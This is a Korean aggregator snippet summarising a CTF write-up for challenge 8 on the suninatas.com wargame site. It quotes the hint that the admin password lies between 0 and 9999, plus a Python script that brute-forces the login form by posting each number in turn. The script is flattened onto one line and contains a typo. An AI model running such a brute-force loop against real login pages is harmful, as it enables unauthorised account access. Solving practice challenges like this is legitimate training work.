로딩
요청 처리 중입니다...

[http://suninatas.com/] 8번문제

 [http://suninatas.com/] 8번문제

<!-- Hint : Login 'admin' Password in 0~9999 --> import requests url="http://suninatas.com/challenge/web08/web08.asp" pw = 0 for pw in range(0,9999): restponse = requests.post(url, data={'id': 'admin', 'pw': pw}) if 'Password Incorrect!'

in restponse.text: print(pw) else: break print(restponse.text)...

[http://suninatas.com/] 8번문제에 대한 요약내용입니다.

자세한 내용은 아래에 원문링크를 확인해주시기 바랍니다.